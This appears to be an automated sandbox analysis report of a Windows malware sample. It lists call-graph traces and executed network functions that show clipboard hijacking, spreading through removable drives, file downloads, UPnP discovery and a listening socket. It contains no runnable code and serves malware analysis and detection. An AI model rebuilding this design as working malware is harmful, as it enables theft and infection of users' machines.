5836 40791a Sleep 5836->5839 5837 407897 Sleep wsprintfA DeleteUrlCacheEntry 5865 40f4b0 InternetOpenA 5837->5865 5839->5835 5839->5836 5839->5837 5840 40f560 63 API calls 5839->5840 5840->5839 5842 4058c9 memset GetModuleHandleW 5841->5842 5843 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5842->5843 5843->5843 5844 405940 CreateWindowExW 5843->5844 5845 40596b 5844->5845 5846 40596d GetMessageA 5844->5846 5847 40599f ExitThread 5845->5847 5848 405981 TranslateMessage DispatchMessageA 5846->5848 5849 405997 5846->5849 5848->5846 5849->5842 5849->5847 5872 40f1f0 CreateFileW 5850->5872 5852 406fa0 5853 4070f8 ExitThread 5852->5853 5855 4070e8 Sleep 5852->5855 5856 406fd9 5852->5856 5875 4063e0 GetLogicalDrives 5852->5875 5855->5852 5881 406300 5856->5881 5859 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5861 407086 wsprintfW 5859->5861 5862 40709b wsprintfW 5859->5862 5860 40700b 5861->5862 5887 4068e0 _chkstk 5862->5887 5866 40f4d6 InternetOpenUrlA 5865->5866 5867 40f548 Sleep 5865->5867 5868 40f4f5 HttpQueryInfoA 5866->5868 5869 40f53e InternetCloseHandle 5866->5869 5867->5839 5870 40f534 InternetCloseHandle 5868->5870 5871 40f51e 5868->5871 5869->5867 5870->5869 5871->5870 5873 40f238 5872->5873 5874 40f21f GetFileSize CloseHandle 5872->5874 5873->5852 5874->5873 5880 40640d 5875->5880 5876 406486 5876->5852 5877 40641c RegOpenKeyExW 5878 40643e RegQueryValueExW 5877->5878 5877->5880 5879 40647a RegCloseKey 5878->5879 5878->5880 5879->5880 5880->5876 5880->5877 5880->5879 5882 406359 5881->5882 5883 40631c 5881->5883 5882->5859 5882->5860 5946 406360 GetDriveTypeW 5883->5946 5886 40634b lstrcpyW 5886->5882 5888 4068f7 5887->5888 5889 4068fe 7 API calls 5887->5889 5888->5860 5890 4069d2 5889->5890 5891 406a14 PathFileExistsW 5889->5891 5892 40f1f0 3 API calls 5890->5892 5893 406ac4 5891->5893 5894 406a29 PathFileExistsW 5891->5894 5895 4069de 5892->5895 5898 406af5 PathFileExistsW 5893->5898 5951 4064a0 7 API calls 5893->5951 5896 406a59 PathFileExistsW 5894->5896 5897 406a3a SetFileAttributesW DeleteFileW 5894->5897 5895->5891 5900 4069f5 SetFileAttributesW DeleteFileW 5895->5900 5903 406a6a CreateDirectoryW 5896->5903 5904 406a8c PathFileExistsW 5896->5904 5897->5896 5901 406b06 5898->5901 5902 406b47 PathFileExistsW 5898->5902 5900->5891 5906 40f1f0 3 API calls 5901->5906 5908 406b58 5902->5908 5909 406bca PathFileExistsW 5902->5909 5903->5904 5907 406a7d SetFileAttributesW 5903->5907 5904->5893 5910 406a9d CopyFileW 5904->5910 5905 406ad4 5905->5898 5919 40f1f0 3 API calls 5905->5919 5913 406b12 5906->5913 5907->5904 5908->5909 5914 406b64 PathFileExistsW 5908->5914 5911 406c75 FindFirstFileW 5909->5911 5912 406bdf PathFileExistsW 5909->5912 5910->5893 5915 406ab5 SetFileAttributesW 5910->5915 5911->5888 5918 406c9c 5911->5918 5916 406bf0 5912->5916 5917 406c2c 5912->5917 5913->5902 5920 406b28 SetFileAttributesW DeleteFileW 5913->5920 5914->5909 5921 406b73 CopyFileW 5914->5921 5915->5893 5922 406c12 5916->5922 5923 406bf8 5916->5923 5926 406c34 5917->5926 5927 406c4e 5917->5927 5924 406d5e lstrcmpW 5918->5924 5935 406f35 FindNextFileW 5918->5935 5939 406dba lstrcmpiW 5918->5939 5940 406e21 PathMatchSpecW 5918->5940 5942 406e9f PathFileExistsW 5918->5942 5966 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5918->5966 5925 406aed 5919->5925 5920->5902 5921->5909 5928 406b8b SetFileAttributesW PathFileExistsW 5921->5928 5931 406660 4 API calls 5922->5931 5961 406660 CoInitialize CoCreateInstance 5923->5961 5924->5918 5930 406d74 lstrcmpW 5924->5930 5925->5898 5932 406660 4 API calls 5926->5932 5933 406660 4 API calls 5927->5933 5928->5909 5934 406bab SetFileAttributesW DeleteFileW 5928->5934 5930->5918 5937 406c0d SetFileAttributesW 5931->5937 5932->5937 5933->5937 5934->5909 5935->5924 5938 406f51 FindClose 5935->5938 5937->5911 5938->5888 5939->5918 5940->5918 5941 406e42 wsprintfW SetFileAttributesW DeleteFileW 5940->5941 5941->5918 5942->5918 5943 406eb5 wsprintfW wsprintfW 5942->5943 5943->5918 5944 406f1f MoveFileExW 5943->5944 5944->5935 5947 406388 5946->5947 5950 40633f 5946->5950 5948 40639c QueryDosDeviceW 5947->5948 5947->5950 5949 4063b6 StrCmpNW 5948->5949 5948->5950 5949->5950 5950->5882 5950->5886 5952 406640 InternetCloseHandle 5951->5952 5953 40653e InternetOpenUrlW 5951->5953 5952->5905 5954 406633 InternetCloseHandle 5953->5954 5955 40656b CreateFileW 5953->5955 5954->5952 5956 406626 CloseHandle 5955->5956 5957 406598 InternetReadFile 5955->5957 5956->5954 5958 4065eb CloseHandle wsprintfW DeleteFileW 5957->5958 5959 4065bc 5957->5959 5958->5956 5959->5958 5960 4065c5 WriteFile 5959->5960 5960->5957 5962 406696 5961->5962 5965 4066ee 5961->5965 5963 4066a9 wsprintfW 5962->5963 5964 4066cf wsprintfW 5962->5964 5962->5965 5963->5965 5964->5965 5965->5937 5967 4067f5 lstrcmpW 5966->5967 5968 4068cf 5966->5968 5969 406821 5967->5969 5970 40680b lstrcmpW 5967->5970 5968->5918 5972 40689c FindNextFileW 5969->5972 5970->5969 5971 406823 wsprintfW wsprintfW 5970->5971 5971->5969 5973 406886 MoveFileExW 5971->5973 5972->5967 5974 4068b8 FindClose RemoveDirectoryW 5972->5974 5973->5972 5974->5968 6207 40eba1 6208 40ebaa 6207->6208 6209 40ec9d 6208->6209 6210 40ec13 lstrcmpiW 6208->6210 6211 40ec93 SysFreeString 6210->6211 6212 40ec26 6210->6212 6211->6209 6213 40e990 2 API calls 6212->6213 6215 40ec34 6213->6215 6214 40ec85 6214->6211 6215->6211 6215->6214 6216 40ec63 lstrcmpiW 6215->6216 6217 40ec75 6216->6217 6218 40ec7b SysFreeString 6216->6218 6217->6218 6218->6214 6219 406de4 6221 406d8a 6219->6221 6220 406dba lstrcmpiW 6220->6221 6221->6220 6222 406f35 FindNextFileW 6221->6222 6223 406e21 PathMatchSpecW 6221->6223 6229 406e9f PathFileExistsW 6221->6229 6232 4067a0 11 API calls 6221->6232 6224 406f51 FindClose 6222->6224 6225 406d5e lstrcmpW 6222->6225 6223->6221 6227 406e42 wsprintfW SetFileAttributesW DeleteFileW 6223->6227 6226 406f5e 6224->6226 6225->6221 6228 406d74 lstrcmpW 6225->6228 6227->6221 6228->6221 6229->6221 6230 406eb5 wsprintfW wsprintfW 6229->6230 6230->6221 6231 406f1f MoveFileExW 6230->6231 6231->6222 6232->6221 6081 406085 6082 405ffe 6081->6082 6083 40608a LeaveCriticalSection 6082->6083 6084 40abd0 8 API calls 6082->6084 6085 40605c 6084->6085 6085->6083 6086 406fc6 6090 406fa8 6086->6090 6087 4070e8 Sleep 6087->6090 6088 406fd9 6089 406300 4 API calls 6088->6089 6092 406fea 6089->6092 6090->6087 6090->6088 6091 4070f8 ExitThread 6090->6091 6093 4063e0 4 API calls 6090->6093 6094 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6092->6094 6098 40700b 6092->6098 6093->6090 6095 407086 wsprintfW 6094->6095 6096 40709b wsprintfW 6094->6096 6095->6096 6097 4068e0 82 API calls 6096->6097 6097->6098 6099 40f908 6100 40f910 6099->6100 6101 40f9c4 6100->6101 6105 40fb45 6100->6105 6104 40f949 6104->6101 6109 40fa30 RtlUnwind 6104->6109 6107 40fb5a 6105->6107 6108 40fb76 6105->6108 6106 40fbe5 NtQueryVirtualMemory 6106->6108 6107->6106 6107->6108 6108->6104 6110 40fa48 6109->6110 6110->6104 6233 40792a ExitThread 5975 4059b0 GetWindowLongW 5976 4059d4 5975->5976 5977 4059f6 5975->5977 5979 4059e1 5976->5979 5980 405a67 IsClipboardFormatAvailable 5976->5980 5978 4059f1 5977->5978 5982 405a46 5977->5982 5983 405a2e SetWindowLongW 5977->5983 5981 405be4 DefWindowProcA 5978->5981 5986 405a04 SetClipboardViewer SetWindowLongW 5979->5986 5987 4059e7 5979->5987 5984 405a83 IsClipboardFormatAvailable 5980->5984 5985 405a7a 5980->5985 5982->5978 5988 405a4c SendMessageA 5982->5988 5983->5978 5984->5985 5989 405a98 IsClipboardFormatAvailable 5984->5989 5991 405ab5 OpenClipboard 5985->5991 5992 405b7f 5985->5992 5986->5981 5987->5978 5990 405b9d RegisterRawInputDevices ChangeClipboardChain 5987->5990 5988->5978 5989->5985 5990->5981 5991->5992 5994 405ac5 GetClipboardData 5991->5994 5992->5978 5993 405b85 SendMessageA 5992->5993 5993->5978 5994->5978 5995 405add GlobalLock 5994->5995 5995->5978 5996 405af5 5995->5996 5997 405b08 5996->5997 5998 405b29 5996->5998 5999 405b3e 5997->5999 6000 405b0e 5997->6000 6001 40d250 13 API calls 5998->6001 6017 4057f0 5999->6017 6002 405b14 GlobalUnlock CloseClipboard 6000->6002 6011 405680 6000->6011 6001->6002 6002->5992 6006 405b67 6002->6006 6025 404970 lstrlenW 6006->6025 6009 40ab60 __aligned_recalloc_base 3 API calls 6010 405b7c 6009->6010 6010->5992 6012 40568b 6011->6012 6013 405691 lstrlenW 6012->6013 6014 4056a4 6012->6014 6015 40a950 __aligned_recalloc_base 7 API calls 6012->6015 6016 4056c1 lstrcpynW 6012->6016 6013->6012 6013->6014 6014->6002 6015->6012 6016->6012 6016->6014 6022 4057fd 6017->6022 6018 405803 lstrlenA 6018->6022 6023 405816 6018->6023 6019 405740 2 API calls 6019->6022 6020 40a950 __aligned_recalloc_base 7 API calls 6020->6022 6022->6018 6022->6019 6022->6020 6022->6023 6024 40ab60 __aligned_recalloc_base 3 API calls 6022->6024 6059 4057a0 6022->6059 6023->6002 6024->6022 6027 4049a4 6025->6027 6026 404bfd 6026->6009 6027->6026 6031 404c0f 6027->6031 6036 404d90 StrStrW 6027->6036 6028 404e81 StrStrW 6029 404e94 6028->6029 6030 404e98 StrStrW 6028->6030 6029->6030 6032 404eab 6030->6032 6033 404eaf StrStrW 6030->6033 6031->6026 6031->6028 6032->6033 6034 404ec2 6033->6034 6045 404ed8 6034->6045 6064 4048a0 lstrlenW 6034->6064 6036->6031 6037 404dbb StrStrW 6036->6037 6037->6031 6038 404de6 StrStrW 6037->6038 6038->6031 6039 4054aa StrStrW 6041 4054c4 StrStrW 6039->6041 6042 4054bd 6039->6042 6040 40544f StrStrW 6043 405462 6040->6043 6044 40546b StrStrW 6040->6044 6046 4054d7 6041->6046 6047 4054de StrStrW 6041->6047 6042->6041 6043->6039 6044->6043 6048 405487 StrStrW 6044->6048 6045->6026 6045->6039 6045->6040 6046->6047 6049 4054f1 6047->6049 6050 4054f8 StrStrW 6047->6050 6048->6043 6049->6050 6051 405512 StrStrW 6050->6051 6052 40550b 6050->6052 6053 405525 lstrlenA 6051->6053 6052->6051 6053->6026 6055 4055ff GlobalAlloc 6053->6055 6055->6026 6056 40561a GlobalLock 6055->6056 6056->6026 6057 40562d memcpy GlobalUnlock OpenClipboard 6056->6057 6057->6026 6058 40565a EmptyClipboard SetClipboardData CloseClipboard 6057->6058 6058->6026 6060 4057ab 6059->6060 6061 4057b1 lstrlenA 6060->6061 6062 405740 2 API calls 6060->6062 6063 4057e4 6060->6063 6061->6060 6062->6060 6063->6022 6068 4048c4 6064->6068 6065 404911 iswalpha 6067 40492c iswdigit 6065->6067 6065->6068 6066 40490d 6066->6045 6067->6068 6068->6065 6068->6066 6068->6067 6125 40df50 6126 40bf20 341 API calls 6125->6126 6127 40df88 6126->6127 6128 40db50 6133 401b60 6128->6133 6130 40db65 6131 40db84 6130->6131 6132 401b60 16 API calls 6130->6132 6132->6131 6134 401b70 6133->6134 6152 401c42 6133->6152 6135 40a740 7 API calls 6134->6135 6134->6152 6136 401b9d 6135->6136 6137 40abd0 8 API calls 6136->6137 6136->6152 6138 401bc9 6137->6138 6139 401be6 6138->6139 6140 401bd6 6138->6140 6142 401ae0 4 API calls 6139->6142 6141 40ab60 __aligned_recalloc_base 3 API calls 6140->6141 6143 401bdc 6141->6143 6144 401bf3 6142->6144 6143->6130 6145 401c33 6144->6145 6146 401bfc EnterCriticalSection 6144->6146 6149 40ab60 __aligned_recalloc_base 3 API calls 6145->6149 6147 401c13 6146->6147 6148 401c1f LeaveCriticalSection 6146->6148 6147->6148 6148->6130 6150 401c3c 6149->6150 6151 40ab60 __aligned_recalloc_base 3 API calls 6150->6151 6151->6152 6152->6130 6153 40f910 6154 40f92e 6153->6154 6156 40f9c4 6153->6156 6155 40fb45 NtQueryVirtualMemory 6154->6155 6158 40f949 6155->6158 6157 40fa30 RtlUnwind 6157->6158 6158->6156 6158->6157 6159 40d510 6164 40b6f0 6159->6164 6162 40d53a 6163 40d550 341 API calls 6163->6162 6165 40b780 2 API calls 6164->6165 6166 40b6ff 6165->6166 6167 40b709 6166->6167 6168 40b70d EnterCriticalSection 6166->6168 6167->6162 6167->6163 6169 40b72c LeaveCriticalSection 6168->6169 6169->6167 6171 40d9d0 6172 40d9e6 6171->6172 6176 40da3e 6171->6176 6173 40d9f0 6172->6173 6174 40da43 6172->6174 6175 40da93 6172->6175 6172->6176 6177 40a740 7 API calls 6173->6177 6179 40da68 6174->6179 6180 40da5b InterlockedDecrement 6174->6180 6198 40c570 6175->6198 6181 40d9fd 6177->6181 6182 40ab60 __aligned_recalloc_base 3 API calls 6179->6182 6180->6179 6194 4023d0 6181->6194 6184 40da74 6182->6184 6185 40ab60 __aligned_recalloc_base 3 API calls 6184->6185 6185->6176 6187 40b6f0 4 API calls 6189 40da1f 6187->6189 6188 40dab9 6188->6176 6192 40daf1 IsBadReadPtr 6188->6192 6193 40bf20 341 API calls 6188->6193 6203 40c670 6188->6203 6189->6176 6190 40da2b InterlockedIncrement 6189->6190 6190->6176 6192->6188 6193->6188 6195 402413 6194->6195 6196 4023d9 6194->6196 6195->6187 6196->6195 6197 4023ea InterlockedIncrement 6196->6197 6197->6195 6199 40c583 6198->6199 6200 40c5ad memcpy 6198->6200 6201 40a990 9 API calls 6199->6201 6200->6188 6202 40c5a4 6201->6202 6202->6200 6204 40c699 6203->6204 6205 40c68e 6203->6205 6204->6205 6206 40c6b1 memmove 6204->6206 6205->6188 6206->6205 6234 4084f9 6235 408502 6234->6235 6236 408511 34 API calls 6235->6236 6237 409346 6235->6237 6238 405fbd 6239 405f51 6238->6239 6242 405fa6 memcpy 6239->6242 6243 405fbb 6239->6243 6240 40ab60 __aligned_recalloc_base 3 API calls 6241 405fc8 LeaveCriticalSection 6240->6241 6242->6243 6243->6240 6245 40ac3e 6246 40ab60 __aligned_recalloc_base 3 API calls 6245->6246 6249 40abfd 6246->6249 6247 40ac12 6248 40a950 __aligned_recalloc_base 7 API calls 6248->6249 6249->6247 6249->6248 6250 40ac14 memcpy 6249->6250 6250->6249

                                                                                                                                    Executed Functions

                                                                                                                                    Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 263 40e190-40e1b7 socket 264 40e2f1-40e2f5 263->264 265 40e1bd-40e285 htons inet_addr setsockopt call 40b430 bind lstrlenA sendto ioctlsocket 263->265 266 40e2f7-40e2fd 264->266 267 40e2ff-40e305 264->267 270 40e28b-40e292 265->270 266->267 271 40e294-40e2a3 call 40e310 270->271 272 40e2e5-40e2e9 call 40b4f0 270->272 275 40e2a8-40e2b0 271->275 276 40e2ee 272->276 277 40e2b2 275->277 278 40e2b4-40e2e3 call 40a990 275->278 276->264 277->272 278->270
                                                                                                                                    APIs
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                      • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                      • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                    • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                    • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                      • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                      • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                      • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                      • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                    • String ID: 239.255.255.250$X#A
                                                                                                                                    • API String ID: 726339449-2206458040
                                                                                                                                    • Opcode ID: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
                                                                                                                                    • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                    • Opcode Fuzzy Hash: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
                                                                                                                                    • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 308 402020-402032 call 40a740 311 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 308->311 312 4021aa-4021ae 308->312 313 402076-402089 CreateIoCompletionPort 311->313 314 40219f-4021a8 call 401600 311->314 313->314 315 40208f-402099 call 40dbb0 313->315 314->312 315->314 320 40209f-4020b7 WSASocketA 315->320 320->314 321 4020bd-402120 setsockopt htons bind 320->321 321->314 322 402126-402138 listen 321->322 322->314 323 40213a-402145 WSACreateEvent 322->323 323->314 324 402147-402157 WSAEventSelect 323->324 324->314 325 402159-40215f 324->325 326 402161-402171 call 40dbe0 325->326 327 40217f-40218f call 40dbe0 325->327 331 402176-40217d 326->331 330 402194-40219e 327->330 331->326 331->327
                                                                                                                                    APIs
                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                      • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                      • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                      • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                      • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                    • Opcode ID: 619c20c401e2b3364d0528cdac8d914a84e1654cc4efe0891effe822260bbcd9
                                                                                                                                    • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                    • Opcode Fuzzy Hash: 619c20c401e2b3364d0528cdac8d914a84e1654cc4efe0891effe822260bbcd9
                                                                                                                                    • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                    • Opcode ID: 1abba91ebe41772085043db3870f7912a64bb11f4083ad92eff8d168b7687ff9
                                                                                                                                    • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                    • Opcode Fuzzy Hash: 1abba91ebe41772085043db3870f7912a64bb11f4083ad92eff8d168b7687ff9
                                                                                                                                    • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                    Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                    Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                      • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    Strings
                                                                                                                                    • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                    • String ID: www.update.microsoft.com
